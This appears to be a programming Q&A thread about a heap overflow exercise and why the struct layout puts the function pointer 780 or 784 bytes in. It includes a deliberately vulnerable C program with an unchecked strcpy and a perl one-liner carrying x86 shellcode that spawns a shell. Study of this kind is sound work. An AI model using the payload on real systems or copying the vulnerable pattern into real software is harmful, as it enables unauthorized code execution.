# Heap Overflow - Structure of the heap

Tags: c, heap-memory

When trying to execute a basic heap attack I understand everything, except for size of the input string. The following code can be exploited using `perl -e 'print "\x90" x (760) . "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x78\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80" . "\x00\x98\x04\x08"'` as an argument for the program. The shellcode being used is 21 bytes long. The size of the total string here is 785 bytes, which is 777 of the buffer + 4 of something i don't know and 4 of the function pointer we are overriding.

I read [here](http://www.dcs.warwick.ac.uk/oldmodelling/other/eden/advanced/notes/stack.html) that the 4 bytes are:

> A pointer keeps track the top of heap similar to the stack pointer of the stack

Is my assumption correct?

```
#include <stdio.h>
#include <unistd.h>

void greetUser(char *s) {
    printf("Hello %s!\n", s);
}

struct data_t {
    char buf[777];
    void (*fp)(char *);
} somedata;

int main(int argc, char **argv) {
    somedata.fp = &greetUser;

    if(argc < 2) {
    printf("Usage: %s YourName\n", argv[0]);
    exit(1);
    }

    strcpy(somedata.buf, argv[1]);
    (somedata.fp)(somedata.buf);

    return 0;
}
```

Answer (score 2, accepted):

No, this is not correct.
You just have to overflow 784 bytes:

```
 char buf[777];     // 777 bytes
 <padding>          // usually 7 bytes to have fp 8-byte-aligned
void (*fp)(char *); // 8 bytes function pointer
```

on 64-bit-systems. On 32-bit-systems fp should be 4-byte-aligned (hence fp starts 780 bytes after beginning of the structure)

Comment: Can you also explain why above code works (with the added 4 bytes) and not without the 4 bytes?

Comment: As I said, the first 777 bytes fill the array buf[777]. The next 3 or 7 bytes (depending on your architecture) overwrite the padding in the structure, which aligns the pointer fp properly. Overwriting the padding has no effect at all, since the data is not used. Finally, after all that, the next bytes copied overwrite the function pointer fp (which is either 4 or 8 bytes, again depending on if you are using ia32 or ia64)

Comment: Btw, I would be surprised if the exploit really worked, since strcpy stops copying at the first 0-byte (which is the first byte of your return address)

Comment: It correctly spawned the shell, maybe it was something else that made it work